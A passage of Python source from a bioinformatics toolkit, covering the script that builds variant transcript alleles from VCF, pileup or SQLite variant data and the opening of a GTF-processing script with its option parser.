class VariantGetterSqlite(VariantGetter):
'''retrieve variants from an sqlite table in pileup format.'''
def __init__(self, dbname, tablename):
self.dbname = dbname
self.tablename = tablename
self.dbhandle = sqlite3.connect(dbname)
self.statement = '''SELECT
pos, reference, genotype
FROM %(tablename)s
WHERE contig = '%(contig)s' AND
pos BETWEEN %(start)s and %(end)s
'''
def __call__(self, contig, start, end):
cc = self.dbhandle.cursor()
tablename = self.tablename
cc.execute(self.statement % locals())
variants = map(Variants.Variant._make, cc.fetchall())
cc.close()
return variants
class VariantGetterPileup(VariantGetter):
'''retrieve variants from file in pileup format.'''
def __init__(self, filename):
self.tabix = pysam.Tabixfile(filename)
self.contigs = set(self.tabix.contigs)
def __call__(self, contig, start, end):
variants = []
if contig not in self.contigs:
return []
for line in self.tabix.fetch(contig, start, end):
data = line[:-1].split()
contig, pos, reference, genotype = data[:4]
# fix 1-ness
pos = int(pos) - 1
variants.append(Variants.Variant._make((pos, reference, genotype)))
return variants
class VariantGetterVCF(VariantGetter):
'''retrieve variants from tabix indexed vcf file.'''
def __init__(self, filename, sample):
self.sample = sample
self.vcf = pysam.VCF()
self.vcf.connect(filename)
if sample not in self.vcf.getsamples():
raise KeyError("sample %s not vcf file" % sample)
def __call__(self, contig, start, end):
variants = []
s = self.sample
try:
iter = self.vcf.fetch(contig, start, end)
except ValueError:
# contigs not in variants, ignore
return variants
for row in iter:
result = pysam.Pileup.vcf2pileup(row, s)
if not result:
continue
variants.append(
Variants.Variant._make((result.pos, result.reference_base, result.genotype)))
return variants
def collectExonIntronSequences(transcripts, fasta):
'''collect all the wild type sequences for exons and introns
exons and introns are indexed by their respective positions.
The function changes coordinates in ``gtfs`` to reverse coordinates.
'''
contig = transcripts[0][0].contig
strand = transcripts[0][0].strand
lcontig = fasta.getLength(contig)
all_exons, all_introns = {}, {}
for exons in transcripts:
for exon in exons:
exon.invert(lcontig)
start, end = exon.start, exon.end
key = start, end
if key not in all_exons:
all_exons[key] = fasta.getSequence(
contig, strand, start, end).lower()
intron_intervals = GTF.toIntronIntervals(exons)
for start, end in intron_intervals:
key = start, end
if key not in all_introns:
all_introns[key] = fasta.getSequence(
contig, strand, start, end).lower()
return all_exons, all_introns
def buildCompactVariantSequences(variants, sequences):
'''build variant sequences by inserting ``variants`` into ``sequences``.
The original frame of the sequence is maintained by
converting the input sequence to a list. Each entry
in the list corresponds to a position in a wild type.
The wild type (WT) sequence is lower case
SNP: variant (ambiguity codes for variants)
homozygous insertion: upper-case bases after lower-case (WT) base
heterozygous insertion: lower-case bases after lower-case (WT) base
homozygous deletion: empty fields
heterozygous deletion: "-" after lower-case (WT) base
returns a dictionary of lists.
'''
result = {}
for key, sequence in sequences.iteritems():
variant_seq = list(sequence.lower())
start, end = key
# get all variants that overlap with sequences
for var_start, var_end, values in variants.find(start, end):
reference, action, has_wildtype, variantseqs = values
is_homozygous = len(variantseqs) == 1 and not has_wildtype
rel_start, rel_end = var_start - start, var_end - start
startoffset = max(0, start - var_start)
endoffset = max(0, var_end - end)
if action == "=":
assert rel_start >= 0
assert sequence[rel_start].upper() == reference, \
'reference base mismatch: expected %s, got %s at %i-%i' % \
(sequence[rel_start].upper(), reference,
var_start, var_end)
if is_homozygous:
variant_seq[rel_start] = variantseqs[0]
else:
variant_seq[rel_start] = Genomics.resolveReverseAmbiguousNA(
"".join(variantseqs))
elif action == "-":
xstart, xend = max(0, rel_start), min(len(sequence), rel_end)
for variant in variantseqs:
# truncated for variants of unequal lengths (-AA/-AAA)
refseq = sequence[xstart:xend].upper()[:len(variant)]
assert refseq == variant[startoffset:len(variant) - endoffset], \
'reference base mismatch at deletion: expected %s %s %s, got %s[%i:%i] at %i-%i (%i-%i), action=%s' % \
(sequence[xstart - 10:xstart],
refseq,
sequence[xend:xend + 10],
variant, startoffset, len(variant) - endoffset,
var_start, var_end, start, end,
action)
l = len(variant) - startoffset - endoffset
if is_homozygous:
variant_seq[xstart:xend] = [""] * l
else:
for x in range(xstart, xend):
if variant_seq[x].endswith("-"):
assert not has_wildtype
variant_seq[x] = ""
else:
variant_seq[x] += "-"
elif action == "+":
if is_homozygous:
variant_seq[rel_start] += variantseqs[0].upper()
else:
if has_wildtype:
variant_seq[rel_start] += variantseqs[0].upper()
else:
# merge indels like +AAA/+AA
a, b = variantseqs
if a.startswith(b):
variant_seq[
rel_start] += b.upper() + a[len(b):].lower()
elif b.startswith(a):
variant_seq[
rel_start] += a.upper() + b[len(a):].lower()
else:
raise ValueError(
"don't know how to encode variant: %s" % variantseqs)
result[(start, end)] = variant_seq
return result
def buildVariantSequences(indexed_variants, sequences):
'''build variant sequences by inserting ``variants`` into ``sequences``.
For each sequence, two alleles are returned. Both alleles are initialized
as wildtype sequences. In the absence of any phasing information, variants
are preferably added to the second allele, such that the wild-type status
of the first allele is preserved as much as possible
returns a dictionary of lists.
'''
result = {}
for key, sequence in sequences.iteritems():
feature_start, feature_end = key
variants = [
(x, y,) + z for (x, y, z) in indexed_variants.find(feature_start, feature_end)]
allele1, allele2 = Variants.buildAlleles(sequence,
variants,
reference_start=feature_start)
result[(feature_start, feature_end)] = (allele1, allele2)
return result
def buildCDSSequence(transcript, exons):
'''build transcript sequences from exons.'''
cds = []
for exon in transcript:
cds.append(exons[exon.start, exon.end])
return "".join(cds)
def buildAlleles(transcript,
variant_exons,
variant_introns,
reference_exons,
reference_introns,
offsets,
is_seleno=False,
frameshiftsize=5,
reference_coordinates=False):
'''reconstitute variant transcript sequences from
variant exons and introns. This method returns alleles
as they are estimated to look like taking into account
splice effects and nonsense mediated decay.
Transcripts are build in the following way:
1. The exonic sequences are examinated for stop codons.
If they contain a stop-codon in the last exon, the sequence
will be truncated at the stop. If a stop-codon exists
in exons before the last codon, the allele is thought to
have been knocked out due to NMD and it is set to 0.
2. If a splice-site is disrupted, the transcript is
truncated (it is not extended to the first stop, as
splicing might be recovered).
If ``variant_exons`` and ``variant_introns`` are set to
None, the two wildtype alleles will be returned.
Scenarios that this method ignores:
1. insertion after 3' splice site are counted as belonging
to the intron and not the exon, though they could be either.
2. insertion before the 5' splice are counted as belonging
to the exon and not the intron.
If ``reference_coordinates`` is set to true, exon coordinates are
taken from the reference. This ensures, that the base that is
derived from the same reference sequence gets the same coordinate
in the two alleles. The alternative is allelic coordinates, that
take into account intron size changes. For example, the reference
has two exons, (100,200) and (300,400). Due to variants, the
first allele has now an intron size of 110. Thus, in allelic coordinates,
the coordinates are ((100,200), (310,410)) and ((100,200),(300,400)),
while in reference coordinates, both alleles whould have the same
coordinates. Note that due to insertions/deletion, the coordinates
might change within an exon, too.
returns two alleles
'''
result = []
def _buildAllele(allele_id,
transcript, exons,
introns, offsets,
virtual_coordinates=False,
reference_exons=None):
def _getOffset(pos, offsets):
x = 0
while x < len(offsets) and offsets[x][0] <= pos:
x += 1
x -= 1
if x >= 0:
return offsets[x][1]
else:
return 0
def _sumIndels(ss):
'''sum indels within ss'''
c = 0
for s in ss:
c += len(s) - 1
return c
def _getEndOffsets(ss):
'''get the offset at exons due to deletions at
start/end of exon.'''
l = len(ss)
x = 0
while x < l and ss[x] == "":
x += 1
start_offset = x
x = l - 1
while x >= 0 and ss[x] == "":
x -= 1
if x >= 0:
return start_offset, (l - 1) - x
else:
return start_offset, 0
def _addCds2Reference(map_cds2reference,
cds_start,
cds_seq,
reference_start):
'''add cds to reference'''
c, r = cds_start, reference_start
for x in cds_seq:
l = len(x)
if l == 0:
r += 1
else:
map_cds2reference.addPair(c, r)
c += l
r += 1
# counts
is_splice_truncated = False
is_nmd_knockout = False
is_stop_truncated = False
nuncorrected_frameshifts = 0
ncorrected_frameshifts = 0
nframeshifts = 0
nsplice_noncanonical = 0
reference_first_stop_start = -1
reference_first_stop_end = -1
# map between the new cds sequence and the reference
# sequence
map_cds2reference = alignlib_lite.py_makeAlignmentBlocks()
###################################################
# process first exon
exon = transcript[0]
transcript_id = exon.transcript_id
# collect offset for exon.start
genome_start = exon.start
genome_start += _getOffset(genome_start, offsets)
lcds, cds = 0, []
cds_starts = [0]
# still need to deal with deletions of first base:
exon_starts = [genome_start]
exon_key = (exon.start, exon.end)
exon_sequence = exons[exon_key]
exon_seq = "".join(exon_sequence)
cds.append(exon_seq)
_addCds2Reference(map_cds2reference,
lcds,
exon_sequence,
exon.start)
lcds = len(exon_seq)
if len(exon_seq) != exon.end - exon.start:
nframeshifts += 1
# add first exon to genome position
genome_pos = genome_start + len(exon_seq)
last_end = exon.end
# correct for deletions at start/end of exon
start_offset, end_offset = _getEndOffsets(exon_sequence)
# length of original transcript
loriginal = sum([x.end - x.start for x in transcript])
if E.global_options.loglevel >= 8:
print "%i: exon_indels (%i-%i):" % (allele_id, exon.start, exon.end)
for x, c in enumerate(exons[exon_key]):
if len(c) != 1:
print x + exon.start, ":%s:" % c
print
print exons[exon_key]
print "genome_pos=", genome_pos, \
",exon=%i-%i" % (genome_pos, genome_pos + len(exon_seq)), \
", len(exon_seq)=", len(exon_seq), \
", len(exon)=", exon.end - exon.start, \
", offsets=%i,%i," % (start_offset, end_offset), \
", offset at start=", _getOffset( exon.start, offsets), \
", offset at end=", _getOffset(exon.end, offsets)
for exon in transcript[1:]:
last_exon_sequence = exon_sequence
last_start_offset, last_end_offset = start_offset, end_offset
# get the next intron/exon parameters
exon_key = (exon.start, exon.end)
exon_sequence = exons[exon_key]
start_offset, end_offset = _getEndOffsets(exon_sequence)
intron_key = (last_end, exon.start)
if last_end == exon.start:
# catch empty introns
intron_sequence = []
intron_key = None
else:
intron_sequence = introns[intron_key]
intron_seq = "".join(intron_sequence)
###################################################
###################################################
###################################################
# add preceding intron
new_exon = True
if len(intron_seq) > frameshiftsize:
intron_name, intron_seq5, intron_seq3 = Genomics.GetIntronType(
intron_seq)
if intron_name == "unknown":
if intron_seq[:2].islower() and intron_seq[-2:].islower():
E.debug("%s: transcript has unknown splice signal - kept because not a variant: %s: %s:%s" %
(transcript_id, intron_name, intron_seq5, intron_seq3))
nsplice_noncanonical += 1
else:
is_splice_truncated = True
E.debug("%s: transcript has splice truncated allele: %s: %s:%s" %
(transcript_id, intron_name, intron_seq5, intron_seq3))
break
# start a new exon
cds_starts.append(lcds)
else:
# treat as frameshifting intron
#
# frame-shifting introns are checked if they are
# fixed by indels either in the intron itself or
# the terminal exon sequence. To this end, the effective
# size of the intron is computed:
# effective size of intron =
# indels at terminal x bases at previous exon
# + size of intron
# + indels at terminal x bases at next exon
effective_intron_size = len(intron_seq)
previous_indels = _sumIndels(
last_exon_sequence[max(0, -frameshiftsize):])
next_indels = _sumIndels(exon_sequence[:frameshiftsize])
effective_intron_size += previous_indels + next_indels
if previous_indels + next_indels == 0 and len(intron_seq) % 3 == 0:
has_stop = "X" in Genomics.translate(intron_seq.upper(),
is_seleno=is_seleno)
else:
has_stop = False
if effective_intron_size % 3 == 0 and not has_stop:
E.debug("%s: fixed frame-shifting intron %i-%i of size %i (size:%i, indels:%i,%i)" %
(transcript_id, last_end, exon.start,
effective_intron_size,
len(intron_seq),
previous_indels, next_indels,))
# add to previous exon
cds.append(intron_seq)
lcds += len(intron_seq)
ncorrected_frameshifts += 1
new_exon = False
else:
E.debug("%s: could not fix frame-shifting intron %i-%i of size %i (size:%i, indels:%i,%i, has_stop=%i)" %
(transcript_id, last_end, exon.start,
effective_intron_size,
len(intron_seq),
previous_indels, next_indels,
has_stop))
nuncorrected_frameshifts += 1
# start a new exon
cds_starts.append(lcds)
if E.global_options.loglevel >= 8:
print "%i: intron_indels (%i-%i):" % (allele_id, last_end, exon.start)
if intron_key:
for x, c in enumerate(introns[intron_key]):
if len(c) != 1:
print x + last_end, ":%s:" % c
print
print introns[intron_key]
print "genome_pos=", genome_pos, \
",intron=%i-%i" % (genome_pos, genome_pos + len(intron_seq)), \
", len(intron_seq)=", len(intron_seq), \
", len(intron)=", exon.start - last_end, \
", offset at start=", _getOffset( last_end, offsets), \
", offset at end=", _getOffset(exon.start, offsets)
else:
print "empty intron"
genome_pos += len(intron_seq)
# assertion - check if genomic coordinate of intron is consistent
# with offset
test_offset = _getOffset(exon.start, offsets)
is_offset = genome_pos - exon.start
assert is_offset == test_offset, "intron offset difference: %i != %i" % (
is_offset, test_offset)
###################################################
###################################################
###################################################
# add the exon
exon_seq = "".join(exon_sequence)
cds.append(exon_seq)
if len(exon_seq) != exon.end - exon.start:
nframeshifts += 1
if new_exon:
if reference_coordinates:
exon_starts.append(exon.start + start_offset)
else:
exon_starts.append(genome_pos)
_addCds2Reference(map_cds2reference,
lcds,
exon_sequence,
exon.start)
lcds += len(exon_seq)
last_end = exon.end
if E.global_options.loglevel >= 8:
print "%i: exon_indels (%i-%i):" % (allele_id, exon.start, exon.end)
for x, c in enumerate(exons[exon_key]):
if len(c) != 1:
print x + exon.start, ":%s:" % c
print
print exons[exon_key]
print "genome_pos=", genome_pos, \
",exon=%i-%i" % (genome_pos, genome_pos + len(exon_seq)), \
", len(exon_seq)=", len(exon_seq), \
", len(exon)=", exon.end - exon.start, \
", offsets=%i,%i," % (start_offset, end_offset), \
", offset at start=", _getOffset( exon.start, offsets), \
", offset at end=", _getOffset(exon.end, offsets)
genome_pos += len(exon_seq)
test_offset = _getOffset(exon.end, offsets)
is_offset = genome_pos - exon.end
assert is_offset == test_offset, "exon offset difference: %i != %i" % (
is_offset, test_offset)
cds = "".join(cds)
assert lcds == len(cds)
# fix incomplete codons at the end of the sequence
if lcds % 3 != 0:
offset = lcds % 3
cds = cds[:-offset]
# add frame correction for transcripts that do not start at frame=0
start_frame = (3 - (int(transcript[0].frame) % 3)) % 3
# n are ignored (? in sequence to deal with genes like Muc2)
peptide = Genomics.translate("n" * start_frame + cds,
is_seleno=is_seleno,
prefer_lowercase=False,
ignore_n=True)
# find the first stop codon
if start_frame != 0:
# ignore first, potentially incomplete base
pep_first_stop = peptide.upper().find("X", 1)
else:
pep_first_stop = peptide.upper().find("X")
E.debug("%s: translated peptide = %s, first stop at %i" %
(transcript_id, peptide, pep_first_stop))
peptide = peptide.replace("?", "x")
if E.global_options.loglevel >= 8:
E.debug("peptide=%s" % peptide)
E.debug("cds=%s" % cds)
E.debug("%s: start_frame=%i, first stop at %i/%i" % (transcript_id,
start_frame,
pep_first_stop,
len(peptide)))
lpeptide, lcds = len(peptide), len(cds)
# check for non-sense mediated decay
if pep_first_stop != -1:
cds_first_stop = pep_first_stop * 3 - start_frame
if cds_first_stop < cds_starts[-1]:
if ncorrected_frameshifts or nuncorrected_frameshifts:
E.warn("nmd knockout transcript %s has frameshifts: %i corrected, %i uncorrected" %
(transcript_id,
ncorrected_frameshifts,
nuncorrected_frameshifts))
is_nmd_knockout = True
cds = peptide = ""
lpeptide, lcds = 0, 0
reference_first_stop_start, reference_first_stop_end = \
(map_cds2reference.mapRowToCol(cds_first_stop),
map_cds2reference.mapRowToCol(cds_first_stop + 3))
elif pep_first_stop < len(peptide) - 1:
is_stop_truncated = True
cds = cds[:cds_first_stop]
peptide[:pep_first_stop]
lpeptide, lcds = len(peptide), len(cds)
reference_first_stop_start, reference_first_stop_end = \
(map_cds2reference.mapRowToCol(cds_first_stop),
map_cds2reference.mapRowToCol(cds_first_stop + 3))
else:
E.warn("first stop at %i(cds=%i) ignored: last exon start at %i" %
(pep_first_stop,
cds_first_stop,
cds_starts[-1]))
else:
# -1 for no stop codon found
pep_first_stop = -1
cds_first_stop = -1
lpeptide, lcds = len(peptide), len(cds)
if peptide is None and nframeshifts == 0:
E.warn(
"transcript %s is knockout, though there are no indels - must be nonsense mutation" % (transcript_id))
# build frames
frames = [start_frame]
start = start_frame
l = 0
for end in cds_starts[1:]:
l += end - start
frames.append((3 - l % 3) % 3)
start = end
return Allele._make((cds,
peptide,
len(cds_starts),
cds_starts,
exon_starts,
frames,
is_nmd_knockout,
is_splice_truncated,
is_stop_truncated,
nframeshifts,
ncorrected_frameshifts,
nuncorrected_frameshifts,
pep_first_stop,
lpeptide,
cds_first_stop,
lcds,
reference_first_stop_start,
reference_first_stop_end,
loriginal,
nsplice_noncanonical,
)), map_cds2reference
if variant_exons or variant_introns:
for allele in range(0, 2):
exons = dict([(x, y[allele])
for x, y in variant_exons.iteritems()])
introns = dict([(x, y[allele])
for x, y in variant_introns.iteritems()])
result.append(
_buildAllele(allele, transcript, exons, introns, offsets[allele]))
else:
a = _buildAllele(0, transcript, reference_exons, reference_introns, [])
result.append(a)
result.append(a)
return result
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(
version="%prog version: $Id: gtf2alleles.py 2886 2010-04-07 08:47:46Z andreas $", usage=globals()["__doc__"])
parser.add_option("-g", "--genome-file", dest="genome_file", type="string",
help="filename with genome [default=%default].")
parser.add_option("-t", "--tablename", dest="tablename", type="string",
help="tablename to get variants from (in samtools pileup format) [default=%default].")
parser.add_option("-d", "--database", dest="database", type="string",
help="sqlite3 database [default=%default].")
parser.add_option("-f", "--exons-file", dest="filename_exons", type="string",
help="filename with transcript model information (gtf formatted file) [default=%default].")
parser.add_option("-r", "--filename-reference", dest="filename_reference", type="string",
help="filename with transcript models of a reference gene set. Stop codons that do not"
" overlap any of the exons in this file are ignore (gtf-formatted file) [default=%default].")
parser.add_option("--vcf-file", dest="filename_vcf", type="string",
help="filename with variants in VCF format. Should be indexed by tabix [default=%default].")
parser.add_option("--pileup-file", dest="filename_pileup", type="string",
help="filename with variants in samtools pileup format. Should be indexed by tabix [default=%default].")
parser.add_option("--vcf-sample", dest="vcf_sample", type="string",
help="sample id for species of interest in vcf formatted file [default=%default].")
parser.add_option("-s", "--seleno-tsv-file", dest="filename_seleno", type="string",
help="filename of a list of transcript ids that are selenoproteins [default=%default].")
parser.add_option("-m", "--module", dest="modules", type="choice", action="append",
choices=("gene-counts", "transcript-effects"),
help="modules to apply [default=%default].")
parser.add_option("-o", "--output-section", dest="output", type="choice", action="append",
choices=("all", "peptide", "cds", "table", "gtf", "map"),
help="sections to output [default=%default].")
parser.add_option("-k", "--with-knockouts", dest="with_knockouts", action="store_true",
help="add alleles that are knocked out to fasta and gtf files [default=%default].")
parser.set_defaults(
genome_file=None,
filename_exons=None,
filename_referenec=None,
filename_seleno=None,
modules=[],
border=200,
separator="|",
tablename=None,
database="csvdb",
output=[],
with_knockouts=False,
filename_vcf=None,
vcf_sample=None,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv, add_output_options=True)
ninput, nskipped, noutput = 0, 0, 0
if options.genome_file:
fasta = IndexedFasta.IndexedFasta(options.genome_file)
else:
fasta = None
if options.filename_seleno:
seleno = set(IOTools.readList(open(options.filename_seleno, "r")))
else:
seleno = {}
infile_gtf = GTF.gene_iterator(GTF.iterator(options.stdin))
# acquire variants from SQLlite database
if options.tablename:
if not options.database:
raise ValueError("please supply both database and tablename")
variant_getter = VariantGetterSqlite(
options.database, options.tablename)
elif options.filename_pileup:
variant_getter = VariantGetterPileup(options.filename_pileup)
elif options.filename_vcf:
variant_getter = VariantGetterVCF(
options.filename_vcf, options.vcf_sample)
else:
raise ValueError("please specify a source of variants.")
if len(options.output) == 0 or "all" in options.output:
output_all = True
else:
output_all = False
if "cds" in options.output or output_all:
outfile_cds = E.openOutputFile("cds.fasta")
else:
outfile_cds = None
if "map" in options.output or output_all:
outfile_map = E.openOutputFile("map.psl")
else:
outfile_map = None
if "peptide" in options.output or output_all:
outfile_peptides = E.openOutputFile("peptides.fasta")
else:
outfile_peptides = None
if "table" in options.output or output_all:
outfile_alleles = E.openOutputFile("table")
outfile_alleles.write("\t".join(
("gene_id",
"transcript_id", "allele_id", "contig", "strand",
"is_wildtype",
("\t".join(Allele._fields)))) + "\n")
else:
outfile_alleles = None
if "gtf" in options.output or output_all:
outfile_gtf = E.openOutputFile("gtf")
else:
outfile_gtf = None
# id separatar
separator = options.separator
for transcripts in infile_gtf:
gene_id = transcripts[0][0].gene_id
overall_start = min([min([x.start for x in y]) for y in transcripts])
overall_end = max([max([x.end for x in y]) for y in transcripts])
contig = transcripts[0][0].contig
strand = transcripts[0][0].strand
is_positive_strand = Genomics.IsPositiveStrand(strand)
lcontig = fasta.getLength(contig)
E.info("%s: started processing on %s:%i..%i (%s)" %
(gene_id, contig, overall_start, overall_end, strand))
ninput += 1
extended_start = max(0, overall_start - options.border)
extended_end = min(lcontig, overall_end + options.border)
# if contig.startswith("chr"): contig = contig[3:]
variants = variant_getter(contig, extended_start, extended_end)
E.debug("%s: found %i variants in %s:%i..%i" %
(gene_id, len(variants), contig, extended_start, extended_end))
if E.global_options.loglevel >= 10:
print "# collected variants:", variants
# collect intron/exon sequences
# coordinates are forward/reverse
# also updates the coordinates in transcripts
all_exons, all_introns = collectExonIntronSequences(transcripts, fasta)
# update variants such that they use the same coordinates
# as the transcript
variants = Variants.updateVariants(variants, lcontig, strand)
# deal with overlapping but consistent variants
variants = Variants.mergeVariants(variants)
E.debug("%s: found %i variants after merging in %s:%i..%i" %
(gene_id, len(variants), contig, extended_start, extended_end))
if E.global_options.loglevel >= 10:
print "# merged variants:", variants
# collect coordinate offsets and remove conflicting variants
variants, removed_variants, offsets = Variants.buildOffsets(
variants, contig=contig)
if len(removed_variants) > 0:
E.warn("removed %i conflicting variants" % len(removed_variants))
for v in removed_variants:
E.info("removed variant: %s" % str(v))
E.info("%i variants after filtering" % len(variants))
if len(variants) > 0:
# build variants
indexed_variants = Variants.indexVariants(variants)
# update exon sequences according to variants
variant_exons = buildVariantSequences(indexed_variants, all_exons)
# update intron sequences according to variants
variant_introns = buildVariantSequences(
indexed_variants, all_introns)
if E.global_options.loglevel >= 10:
for key in variant_exons:
print "exon", key
Genomics.printPrettyAlignment(
all_exons[key],
variant_exons[key][0],
variant_exons[key][1],
)
for key in variant_introns:
print "intron", key
Genomics.printPrettyAlignment(
all_introns[key][:30] + all_introns[key][-30:],
variant_introns[key][0][:30] +
variant_introns[key][0][-30:],
variant_introns[key][1][:30] + variant_introns[key][1][-30:])
else:
variant_exons, variant_introns = None, None
for transcript in transcripts:
transcript.sort(key=lambda x: x.start)
transcript_id = transcript[0].transcript_id
alleles = buildAlleles(transcript,
variant_exons,
variant_introns,
all_exons,
all_introns,
offsets,
is_seleno=transcript_id in seleno,
reference_coordinates=False,
)
##############################################################
##############################################################
##############################################################
# output
for aid, al in enumerate(alleles):
allele, map_cds2reference = al
reference_cds_sequence = buildCDSSequence(
transcript, all_exons)
is_wildtype = reference_cds_sequence == allele.cds
allele_id = str(aid)
assert len(allele.exon_starts) == allele.nexons
assert len(allele.cds_starts) == allele.nexons
assert len(allele.frames) == allele.nexons
# the output id
outid = separator.join((gene_id, transcript_id, allele_id))
# output map between cds and reference
if outfile_map and map_cds2reference:
match = Blat.Match()
match.mQueryId = allele_id
match.mQueryLength = allele.cds_len
match.mSbjctId = contig
match.mSbjctLength = lcontig
match.strand = strand
match.fromMap(map_cds2reference, use_strand=True)
outfile_map.write("%s\n" % str(match))
# only output sequences for genes that have not been knocked
# out, unless required
if not allele.is_nmd_knockout or options.with_knockouts:
if outfile_gtf:
gtf = GTF.Entry()
gtf.gene_id = gene_id
gtf.transcript_id = transcript_id
gtf.addAttribute("allele_id", allele_id)
gtf.contig = contig
gtf.strand = strand
gtf.feature = "CDS"
gtf.source = "gtfxnsps"
l = 0
last_cds_start = allele.cds_starts[0]
gtf.start = allele.exon_starts[0]
gtf.frame = allele.frames[0]
for exon_start, cds_start, frame in zip(allele.exon_starts[1:],
allele.cds_starts[
1:],
allele.frames[1:]):
cds_length = cds_start - last_cds_start
gtf.end = gtf.start + cds_length
if not is_positive_strand:
gtf.start, gtf.end = lcontig - \
gtf.end, lcontig - gtf.start
outfile_gtf.write(str(gtf) + "\n")
gtf.start = exon_start
gtf.frame = frame
l += cds_length
last_cds_start = cds_start
cds_length = len(allele.cds) - last_cds_start
gtf.end = gtf.start + cds_length
if not is_positive_strand:
gtf.start, gtf.end = lcontig - \
gtf.end, lcontig - gtf.start
outfile_gtf.write(str(gtf) + "\n")
if outfile_cds:
outfile_cds.write(">%s\n%s\n" % (outid, allele.cds))
if outfile_peptides:
outfile_peptides.write(
">%s\n%s\n" % (outid, allele.peptide))
# reformat for tabular output
allele = allele._replace(
cds_starts=",".join(map(str, allele.cds_starts)),
exon_starts=",".join(map(str, allele.exon_starts)),
frames=",".join(map(str, allele.frames)))
# convert reference coordinates to positive strand coordinates
if allele.reference_first_stop_start >= 0 and not is_positive_strand:
allele = allele._replace(
reference_first_stop_start=lcontig -
allele.reference_first_stop_end,
reference_first_stop_end=lcontig - allele.reference_first_stop_start, )
if outfile_alleles:
outfile_alleles.write("%s\t%s\n" % (
"\t".join((gene_id,
transcript_id,
allele_id,
contig,
strand,
"%i" % is_wildtype)),
"\t".join(map(str, allele))))
noutput += 1
# only output first allele (debugging)
# break
E.info("ninput=%i, noutput=%i, nskipped=%i" % (ninput, noutput, nskipped))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gtf2gtf.py
```python
import sys
import re
import random
import collections
import itertools
import CGAT.GTF as GTF
import CGAT.Experiment as E
import CGAT.Genomics as Genomics
import CGAT.Intervals as Intervals
import CGAT.IOTools as IOTools
# ------------------------------------------------------------
# This script needs some attention.
# ------------------------------------------------------------
def find_retained_introns(gene):
'''Given a bundle of transcripts, find intervals matching retained
introns. A retained intron is defined as an interval from an exon/intron
boundary to the next where both boundaries are in the same exon of another
transcript'''
intron_intervals = [GTF.toIntronIntervals(transcript)
for transcript in gene]
intron_intervals = list(set(
itertools.chain.from_iterable(intron_intervals)))
intron_intervals.sort()
for transcript in gene:
exons = iter(sorted(GTF.asRanges(transcript)))
introns = iter(intron_intervals)
retained_introns = []
try:
intron = introns.next()
exon = exons.next()
while True:
if exon[1] < intron[0]:
exon = exons.next()
continue
if intron[0] >= exon[0] and intron[1] <= exon[1]:
E.debug("exon %s of transcript %s contains intron %s" %
(exon, transcript[0].transcript_id, intron))
retained_introns.append(intron)
intron = introns.next()
except StopIteration:
pass
retained_introns = Intervals.combine(retained_introns)
for intron in retained_introns:
entry = GTF.Entry()
entry = entry.copy(transcript[0])
entry.start = intron[0]
entry.end = intron[1]
yield entry
def gene_to_blocks(gene):
'''Given a bundle of all exons in a gene, create a seperate exon
for each unqiue part of a exon, as well as one for introns. '''
exons = [(e.start, e.end)
for e in gene if e.feature == "exon"]
exons = list(set(sum(exons, ())))
exons.sort()
entry = GTF.Entry()
entry = entry.copy(gene[0])
entry.transcript_id = "merged"
entry.feature = "exon"
entry.source = "merged"
for i in range(len(exons)-1):
entry.start = exons[i]
entry.end = exons[i+1]
entry.attributes["exon_id"] = str(i + 1)
yield entry
def main(argv=None):
if not argv:
argv = sys.argv
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("--merge-exons-distance",
dest="merge_exons_distance",
type="int",
help="distance in nucleotides between "
"exons to be merged [%default].")
parser.add_option("--pattern-identifier", dest="pattern", type="string",
help="pattern to use for renaming genes/transcripts. "
"The pattern should contain a %i, for example "
"--pattern-identifier=ENSG%010i [%default].")
parser.add_option("--sort-order",
dest="sort_order",
type="choice",
choices=("gene",
"gene+transcript",
"transcript",
"position",
"contig+gene",
"position+gene",
"gene+position",
"gene+exon"),
help="sort input data [%default].")
parser.add_option("--mark-utr",
dest="mark_utr",
action="store_true",
help="mark utr for method --merge-exons. "
"[%default].")
parser.add_option(
"--without-utr",
dest="with_utr",
action="store_false",
help="exclude UTR in methods --merge-exons, merge-transcripts "
"and intersect-transripts. Setting this option will remove "
"non-coding transcripts. "
"[%default].")
parser.add_option(
"--filter-method", dest="filter_method",
type="choice",
choices=("gene",
"transcript",
"longest-gene",
"longest-transcript",
"representative-transcript",
"proteincoding",
"lincrna"),
help="Filter method to apply. Available filters are: "
"'gene': filter by gene_id given in ``--map-tsv-file``, "
"'transcript': filter by transcript_id given in ``--map-tsv-file``, "
"'longest-gene': output the longest gene for overlapping genes ,"
"'longest-transcript': output the longest transcript per gene,"
"'representative-transcript': output the representative transcript "
"per gene. The representative transcript is the transcript "
"that shares most exons with other transcripts in a gene. "
"The input needs to be sorted by gene. "
"'proteincoding': only output protein coding features. "
"'lincrna': only output lincRNA features. "
"[%default].")
parser.add_option("-a", "--map-tsv-file", dest="filename_filter",
type="string",
metavar="tsv",
help="filename of ids to map/filter [%default].")
parser.add_option(
"--gff-file", dest="filename_gff", type="string",
metavar="GFF",
help="second filename of features (see --remove-overlapping) "
"[%default]")
parser.add_option("--invert-filter",
dest="invert_filter",
action="store_true",
help="when using --filter, invert selection "
"(like grep -v). "
"[%default].")
parser.add_option("--sample-size", dest="sample_size", type="int",
help="extract a random sample of size # if the option "
"'--method=filter --filter-method' is set "
"[%default].")
parser.add_option(
"--intron-min-length",
dest="intron_min_length", type="int",
help="minimum length for introns (for --exons-file2introns) "
"[%default].")
parser.add_option("--min-exons-length",
dest="min_exons_length",
type="int",
help="minimum length for gene (sum of exons) "
"(--sam-fileple-size) [%default].")
parser.add_option(
"--intron-border",
dest="intron_border",
type="int",
help="number of residues to exclude at intron at either end "
"(--exons-file2introns) [%default].")
parser.add_option("--ignore-strand",
dest="ignore_strand",
action="store_true",
help="remove strandedness of features (set to '.') when "
"using ``transcripts2genes`` or ``filter``"
"[%default].")
parser.add_option("--permit-duplicates", dest="strict",
action="store_false",
help="permit duplicate genes. "
"[%default]")
parser.add_option(
"--duplicate-feature",
dest="duplicate_feature",
type="choice",
choices=("gene", "transcript", "both", "ucsc", "coordinates"),
help="remove duplicates by gene/transcript. "
"If ``ucsc`` is chosen, transcripts ending on _dup# are "
"removed. This is necessary to remove duplicate entries "
"that are next to each other in the sort order "
